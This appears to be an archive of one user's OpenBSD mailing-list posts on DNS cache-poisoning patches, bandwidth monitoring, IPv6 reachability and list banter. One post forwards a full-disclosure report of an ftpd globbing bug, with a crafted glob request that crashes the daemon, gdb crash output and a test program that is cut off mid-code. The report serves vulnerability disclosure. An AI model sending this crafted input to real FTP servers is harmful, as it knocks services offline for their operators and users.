Re: Why I abandoned OpenBSD, and why you should too...
On Fri, Jul 5, 2013 at 12:28 PM, Tito Mari Francis Escaño < titomarifran...@gmail.com> wrote: > I was initially thinking this is a troll, but with these quotes: > I vote for another troll... but... this year April Fool was over 3 months ago. -- Thank you. Zamri Besar
Ghost Domain Names: Revoked Yet Still Resolvable
Dear all, It said due to design issues in the DNS protocol. So, indirectly and probably this will affect OpenBSD BIND too? Ghost Domain Names: Revoked Yet Still Resolvable https://www.isc.org/software/bind/advisories/cve-2012-1033 -- Thank you. Zamri Besar
Re: Is it necessary to recompile just to apply a security patch?
On Wed, Jul 30, 2008 at 5:25 AM, Ingo Schwarze <[EMAIL PROTECTED]> wrote: > Hi skogzort, > > Nick Guenther wrote on Tue, Jul 29, 2008 at 01:05:52PM -0400: > > On Tue, Jul 29, 2008 at 11:41 AM, skogzort <[EMAIL PROTECTED]> wrote: > > >> I know nothing/very little about OpenBSD or UNIX. I have been tasked > with > >> updating our OpenBSD DNS server with a security fix (Vulnerability Note > >> VU#800113- Multiple DNS implementations vulnerable to cache poisoning). > > That doesn't sound all too well. You have an OpenBSD server, > but you have nobody knowing more than very little about UNIX? > UNIX is easier to administer than Windows, but some learning > will be required... > > Quite probably, your server might be terribly out of date. > OpenBSD servers ought to be updated at least once a year. > Please look at the first line of the output of dmesg(8). > If the version number is lower than "OpenBSD 4.2", > you should upgrade the base system before applying patches. > In any case, you should establish a process for regular > updates of the server. The best times to update are > in May and November, just after the -stable releases. > In my experience, updating twice a year is easier and > less risky than just once: You get used to it. > Regularly ordering the CDs and just upgrading from CD > is the most convenient way to go. > > If your task is to maintain that server, carefully read > http://www.openbsd.org/cgi-bin/cvsweb/src/etc/root/root.mail?rev=HEAD > Have a quick look at the resources referenced there, > just to get an impression what is available. > The man pages, the FAQ and afterboot(8) are particularly useful. > > >> In order to do this it appears that I have to download the source code > >> re-compile the entire OS. Recompiling the OS seems to involve a lot of > >> steps. 
> > Don't compile the whole system from source unless you are actively > hacking on the base system (which clearly you aren't) or unless > you want to track -current using a single build for multiple servers. > As others told you, each errata patch contains instructions what > exactly must be rebuilt, and how. > > >> you don't even have to reboot the server, > > That's indeed true in the present case, yes. > After patching named, you must restart named, > but rebooting would be useless. > > Of course, kernel patches require rebooting - > which applies to Windows machines as well, by the way. ;-) > > > Nick wrote: > > OpenBSD is mostly designed as a monolithic kernel. > > Please stop spreading misleading advice. > This has nothing to do with the kernel. > (Hopefully, skogzort didn't start building kernels yet.) > > Yours, > Ingo > > -- > Ingo Schwarze <[EMAIL PROTECTED]> > usta.de / studis.de system operation > *** Can we get a bind9 kernel module for OpenBSD any time soon? *** > > And I just learned that ISC was releasing -p2 patches for BIND to address stability and performance issues: http://isc.sans.org/diary.html?storyid=4816 -zamri-
Re: MPLS On OpenBGP
On Wed, Aug 6, 2008 at 11:07 PM, Claudio Jeker <[EMAIL PROTECTED]>wrote: > On Wed, Aug 06, 2008 at 03:17:41PM +0100, [EMAIL PROTECTED] wrote: > > Will it be likely possible and feasible to add MPLS feature on OpenBGPd? > > > > Yes. It is neither impossible nor unfeasible. > But don't ask when it will happen unless you like to do the work. > > -- > :wq Claudio > > Or is it possible to port ayame to OpenBSD? Or is it in progress / done? http://www.ayame.org/ -zamri-
Re: Document: OpenBSD for PyMES
On Fri, Aug 8, 2008 at 12:07 PM, Fernando Quintero < [EMAIL PROTECTED]> wrote: > OpenBSD Colombia team, wrote a document about how to configure a OpenBSD > Server for a small company. > Services like dhcp, dns, apache + mysql + php, squid, sarge, nat and > firewall are "touched". > I hope you enjoy it. > Note: Just for people who read spanish. > Note2: it's based on release OpenBSD v4.3 > > URL: http://www.openbsdcolombia.org/?q=node/66 > > See ya!. > > -- > -- > > Fernando Quintero > *Just a nonroot User* > > And google will be trying to help us. :) http://translate.google.com/translate_t http://translate.google.com/translate?u=http%3A%2F%2Fwww.openbsdcolombia.org%2F%3Fq%3Dnode%2F66&hl=en&ie=UTF8&sl=es&tl=en -- Thank you. Zamri Besar
Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable to cache poisoning
Good morning, Today, I received an alert from one of my friends regarding Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable to cache poisoning. http://www.kb.cert.org/vuls/id/800113 I checked the above site, and found that the status of most of the *BSDs is unknown. Does this bug affect the OpenBSD default bind dns? I don't know whether the above bug is similar to this thread or not. http://marc.info/?l=openbsd-misc&m=118539211412877&w=2 -- Thank you. Yours truly, Zamri Besar
Re: Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable to cache poisoning
On Thu, Jul 10, 2008 at 12:14 AM, Mathieu SEGAUD <[EMAIL PROTECTED]> wrote: > You recently told me: > >> On Wed, Jul 09, 2008 at 04:52:39PM +0200, Mathieu SEGAUD wrote: >>> You recently told me: >>> >>> > Good morning, >>> > >>> > Today, I received an alert from one of my friends regarding >>> > Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable >>> > to cache poisoning. >>> > http://www.kb.cert.org/vuls/id/800113 >>> > >>> > I checked the above site, and found that the status of most of the *BSDs is >>> > unknown. Does this bug affect the OpenBSD default bind dns? >>> >>> OpenBSD's named is affected. >>> It is a flaw in the DNS protocol, which means potentially *all* >>> implementations are affected... >> >> Credit where credit is due: djbdns isn't. > > good to know. thanks. thus "potentially" > >> Without specifics on the issue, I can't tell if OpenBSD's bind is truly >> vulnerable, but it certainly does use a fixed source port. > > Stuart Henderson already answered this question on misc@ (12:10 UTC, > today). Named is vulnerable. The resolver is not :) > > -- > Mathieu > > I just finished re-reading it right now. Thank you for the input and I agree that at this moment, we will wait for the latest official update from OpenBSD developers. And probably a minor update for those who are deploying it over Debian. Looks like it is time to patch it. http://www.debian.org/security/2008/dsa-1603 Have a nice day! -zamri-
Re: Identifying Bandwidth Hogs
> On Tue, Jul 8, 2008 at 10:51 PM, David Schulz <[EMAIL PROTECTED]> wrote: >> Hello, >> >> can someone recommend me a good way to quickly determine who on the network >> is using up most the Bandwidth, and preferably, what are they using it for? >> >> I have a 4.3 Machine, which is the Firewall and Router for a Network with >> about 100 Machines. Every once in a while, i see the Traffic picking up >> considerably when using bwm-ng to check. During normal Operation, i know the >> average Kilobytes per second is around 100kbps , but when bwm-ng shows me >> the traffic is going up 750kbps, and then i know something is up. >> >> Normally then i use something like pftop -s 1 -o rate , and then find out >> who is on top of the list. I wonder if anyone has a better way of finding >> Bandwidth Hogs. On an older FreeBSD System, i simply installed iftop, which >> quickly showed me my top Users. Similar to bwm-ng, but basically showing you >> per IP who is using how much Bandwidth. >> >> Ideally would be a way that not only shows me quickly who is using the most >> Bandwidth, but also, if they are using it for HTTP traffic, or simply >> downloading a large mail or having a Skype Conversation or else. >> >> Excellent would also be a way i can somehow graph all of that, so that even >> when i am not in the office, i can identify people who are doing things they >> shouldn't. I do have an RRD Graph for my main Interface, so i can say for >> example a few hours ago something made the Traffic pick up to 750kbps for 20 >> minutes, but i have no idea who it was. I once had all my protocols and IP's >> labeled, and used pfctl -s labels to parse them into my rrd files, but the >> whole process with collecting and graphing got quite slow. >> >> Also i tried darkstat, but it doesn't do a better job than current bwm-ng >> and pftop. 
>> >> Thanks for any suggestions, >> David > > Dear Mr David, Two months ago, one of my members was using Hex to deploy a quick solution to analyze his network. You may try to check and see whether it is suitable for your environment or not by visiting this website: http://www.rawpacket.org/projects/hex Have a nice day! ;) -zamri-
Re: This is what Linus Torvalds calls openBSD crowd
On Sun, Jul 20, 2008 at 7:42 PM, Duncan Patton a Campbell < [EMAIL PROTECTED]> wrote: > > > > Wanking Sea Monkeys, then: the oceanic analogue of fleas, > at least in the area of genital proportion ;-) > > Dhu > > lol. Looks like someone is selling new stuffs over the net: http://www.cafepress.com/spankymm -zamri-
Re: Memory not detected
On Wed, Jul 23, 2008 at 10:59 PM, John Nietzsche <[EMAIL PROTECTED]> wrote: > Dear OpenBSD user, > > i am installing openbsd 4.3 on a dell poweredge 2900 hardware. It has > 8GB RAM but openbsd seems to detect only 4 GB. > Any suggestions on this matter (i would like to have openbsd detecting 8 > GB)? > > Thanks for your time and cooperation. > > Best regards. > > Are you running amd64 or i386 or else? -- Thank you. Zamri Besar
Re: Is it necessary to recompile just to apply a security patch?
On Tue, Jul 29, 2008 at 11:41 PM, skogzort <[EMAIL PROTECTED]> wrote: > Is it necessary to recompile just to apply a security patch? > > Hello, > I know nothing/very little about OpenBSD or UNIX. I have been tasked with > updating our OpenBSD DNS server with a security fix (Vulnerability Note > VU#800113- Multiple DNS implementations vulnerable to cache poisoning). > > In order to do this it appears that I have to download the source code > re-compile the entire OS. Recompiling the OS seems to involve a lot of > steps. > Before I continue to read through them all, I just want to confirm that it > is > actually necessary to do all of this, simply to apply a security patch: > > Down load the tree.. > Pre load the tree.. > Build the Kernel.. > Build the userland.. > Etc. > > The only thing we use the server for is DNS. I don't know what Flavor we > are > running, since its on a production server I assume it will be * release or > * > stable, either way from what I've read so far it looks like in order to > apply > this security patch I will have to update it to * stable. > > Is it true that the only way to apply this patch is to recompile the entire > OS, and go through all the steps above? I'm only familiar with Windows, > where > you just push a button to apply a security patch and you don't even have to > reboot the server, so I was thinking that I may be misunderstanding what > I'm > reading. > > Thanks very much for your time and any info > > Kyle > > > The first step is you need to identify which version of OpenBSD that you're running right now, and apply suitable patches to your system. For latest DNS patches, OpenBSD developers were releasing two versions of security fixes for 4.2 and 4.3. Just follow the given instructions at the top/head of every patch. 
http://www.openbsd.org/errata43.html ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.3/common/004_bind.patch http://www.openbsd.org/errata42.html ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.2/common/013_bind.patch And you may check archive, couple of days ago, iirc someone reported they were successfully updating their DNS in 4.1 by using patch from 4.2. And finally, probably you need to read about this too (not sure whether the above patches will affect DNS performance in OpenBSD, but someone just reporting it about some issue with Ironport, check archive): http://marc.info/?l=bind-users&m=121726908015389&w=2 -- Thank you. Zamri Besar
[Full-disclosure] FreeBSD and OpenBSD ftpd bug (not exploitable?)
Dear all,

Found this in full-disclosure mailing list.

-- Forwarded message --
From: Kingcope
Date: Fri, Mar 5, 2010 at 11:19 PM
Subject: [Full-disclosure] FreeBSD and OpenBSD ftpd bug (not exploitable?)
To: full-disclos...@lists.grok.org.uk, bugt...@securityfocus.com

FreeBSD ftpd globbing bug - null pointer dereference ?

Affected FreeBSD Releases
+-+-+-+-+-+-+-+-+-+
FreeBSD 8.0, 6.3 and 4.9

Affected OpenBSD Releases
+-+-+-+-+-+-+-+-+-+
OpenBSD 4.6

Testing Environment
+-+-+-+-+-+-+-+-+-+
FreeBSD localhost.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386

Full Description
+-+-+-+-+-+-+-+-+-+
FreeBSD (tested back to 4.9-Release) (and OpenBSD 4.6) has a bug in its ftpd when handling globbing requests. My investigation results in this being a null pointer dereference in popen.c. I am not sure if this could be a heap overrun, but I don't think so.

from popen.c:

    /* glob each piece */
    gargv[0] = argv[0];
    for (gargc = argc = 1; argv[argc] && gargc < (MAXGLOBARGS-1); argc++) {
        glob_t gl;
        int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

        memset(&gl, 0, sizeof(gl));
        gl.gl_matchc = MAXGLOBARGS;
        flags |= GLOB_LIMIT;
[1]     if (glob(argv[argc], flags, NULL, &gl))
            gargv[gargc++] = strdup(argv[argc]);
[2]     else
[3]         for (pop = gl.gl_pathv; *pop && gargc < (MAXGLOBARGS-1); pop++)
                gargv[gargc++] = strdup(*pop);
        globfree(&gl);
    }

At [1] glob() is called. if there's a long directory (for example "A" x 200) and a request like described in "how to repeat this problem" is sent to the ftpd it crashes. My assumption is because it lands in the else clause [2], glob doesn't fail but gives back a zeroed out gl structure. In [3] then there's no check if pop is null and therefore *pop gets dereferenced which is a null pointer and the ftpd instance crashes. Could someone please shed some light into why glob doesn't fail but gives a zeroed out structure back?

How to repeat the problem +-+-+-+-+-+-+-+-+-+-+-+-+-+ $ ftp 192.168.2.11 Connected to 192.168.2.11. 220 localhost.Belkin FTP server (Version 6.00LS) ready. Name (192.168.2.11:nr): kcope 331 Password required for kcope. Password: 230 User kcope logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> mkdir W 257 "W" directory created. ftp> ls {W*/../W*/../W*/../W*/../W*/../W*/../W*/} 200 PORT command successful. ---snip--- on the other side: ---snip--- 0x282261e5 in read () at read.S:3 3 RSYSCALL(read) Current language: auto; currently asm (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x0805622c in getline () (gdb) i r eax0x0 0 ecx0x0 0 edx0x0 0 ebx0xbfbfd911 -1077946095 esp0xbfbfba70 0xbfbfba70 ebp0xbfbfcc08 0xbfbfcc08 esi0x1 1 edi0xbfbfcbf4 -1077949452 eip0x805622c 0x805622c eflags 0x10293 66195 cs 0x33 51 ss 0x3b 59 ds 0x3b 59 es 0x3b 59 fs 0x3b 59 gs 0x1b 27 (gdb) x/10i $eip 0x805622c : mov(%edx),%eax 0x805622e : setle %cl 0x8056231 : mov%ecx,%esi 0x8056233 : test %eax,%eax 0x8056235 : je 0x8056281 0x8056237 : test %cl,%cl 0x8056239 : je 0x8056281 0x805623b : mov%edx,%ebx 0x805623d : mov0xee7c(%ebp),%edx 0x8056243 : lea0xee90(%ebp,%edx,4),%edi (gdb) i f Stack level 0, frame at 0xbfbfcc10: eip = 0x805622c in getline; saved eip 0x805047b called by frame at 0xbfbfcc14 Arglist at 0xbfbfcc08, args: Locals at 0xbfbfcc08, Previous frame's sp is 0xbfbfcc10 Saved registers: ebx at 0xbfbfcbfc, ebp at 0xbfbfcc08, esi at 0xbfbfcc00, edi at 0xbfbfcc04, eip at 0xbfbfcc0c (gdb) Testing program: ---snip--- #include #include #define MAXUSRARGS 100 #define MAXGLOBARGS 1000 void do_glob() { glob_t gl; char **pop; char buffer[256]; strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}"); int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE; memset(&gl, 0, sizeof(gl)); gl.gl_matchc = MAXGLOBARGS; flags |= GLOB_LIMIT; if (glob(buffer, flags, NULL, &gl)) { printf("GLOB FAILED!\n"); return 0; } else //for (pop = gl.gl_pathv; pop && *pop 
&& 1 < (MAXGLOBARGS-1); for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1); pop++) {
IPv6 - www.openbsd.org
Good morning, Just a question. www.openbsd.org not reachable via IPv6 network? > ping6 -c2 www.kame.net PING6(56=40+8+8 bytes) 2001:e68:2000:3:215:c5ff:fefb:c22f --> 2001:200:dff:fff1:216:3eff:feb1:44d7 16 bytes from 2001:200:dff:fff1:216:3eff:feb1:44d7, icmp_seq=0 hlim=53 time=128.810 ms 16 bytes from 2001:200:dff:fff1:216:3eff:feb1:44d7, icmp_seq=1 hlim=53 time=121.426 ms --- orange.kame.net ping6 statistics --- 2 packets transmitted, 2 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 121.426/125.118/128.810/3.692 ms > ping6 -c2 www.openbsd.org ping6: hostname nor servname provided, or not known > ping6 -c2 www.freebsd.org PING6(56=40+8+8 bytes) 2001:e68:2000:3:215:c5ff:fefb:c22f --> 2001:4f8:fff6::22 16 bytes from 2001:4f8:fff6::22, icmp_seq=0 hlim=51 time=340.325 ms 16 bytes from 2001:4f8:fff6::22, icmp_seq=1 hlim=51 time=340.765 ms --- red.freebsd.org ping6 statistics --- 2 packets transmitted, 2 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 340.325/340.545/340.765/0.220 ms > ping6 -c2 www.netbsd.org PING6(56=40+8+8 bytes) 2001:e68:2000:3:215:c5ff:fefb:c22f --> 2001:4f8:3:7:2e0:81ff:fe52:9a6b 16 bytes from 2001:4f8:3:7:2e0:81ff:fe52:9a6b, icmp_seq=0 hlim=51 time=341.447 ms 16 bytes from 2001:4f8:3:7:2e0:81ff:fe52:9a6b, icmp_seq=1 hlim=51 time=343.418 ms --- www.netbsd.org ping6 statistics --- 2 packets transmitted, 2 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 341.447/342.433/343.418/0.986 ms > nslookup -type= www.kame.net 8.8.8.8 Server: 8.8.8.8 Address:8.8.8.8#53 Non-authoritative answer: www.kame.netcanonical name = orange.kame.net. 
orange.kame.net has address 2001:200:dff:fff1:216:3eff:feb1:44d7 Authoritative answers can be found from: > nslookup -type= www.openbsd.org 8.8.8.8 Server: 8.8.8.8 Address:8.8.8.8#53 Non-authoritative answer: *** Can't find www.openbsd.org: No answer Authoritative answers can be found from: openbsd.org origin = zeus.theos.com mail addr = root.theos.com serial = 950512 refresh = 17200 retry = 3600 expire = 360 minimum = 86400 > nslookup -type= www.freebsd.org 8.8.8.8 Server: 8.8.8.8 Address:8.8.8.8#53 Non-authoritative answer: www.freebsd.org canonical name = red.freebsd.org. red.freebsd.org has address 2001:4f8:fff6::22 Authoritative answers can be found from: > nslookup -type= www.netbsd.org 8.8.8.8 Server: 8.8.8.8 Address:8.8.8.8#53 Non-authoritative answer: www.netbsd.org has address 2001:4f8:3:7:2e0:81ff:fe52:9a6b Authoritative answers can be found from: -- Thank you. Zamri Besar
The insecurity of OpenBSD
The insecurity of OpenBSD http://allthatiswrong.wordpress.com/2010/01/20/the-insecurity-of-openbsd/ -zamri-